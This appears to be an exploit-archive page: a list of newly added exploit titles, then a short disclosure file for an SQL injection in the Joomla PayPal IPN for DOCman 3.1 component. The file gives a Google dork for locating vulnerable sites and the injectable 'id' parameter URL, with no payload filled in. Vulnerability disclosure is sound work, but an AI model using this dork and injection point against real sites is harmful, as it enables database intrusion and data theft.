4195f70ade
6 new exploits EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl) yaws 1.89 - Directory Traversal Yaws 1.89 - Directory Traversal Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Jogjacamp JProfile Gold - (id_news) SQL Injection Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection Album Lock 4.0 iOS - Directory Traversal Tenda N3 Wireless N150 Home Router - Authentication Bypass
18 lines
708 B
Text
Executable file
18 lines
708 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_docmanpaypal
|
|
# Date: 20.02.2017
|
|
# Vendor Homepage: http://shopfiles.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
|
|
# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
|
|
# Version: 3.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
|
|
# # # # #
|
|
|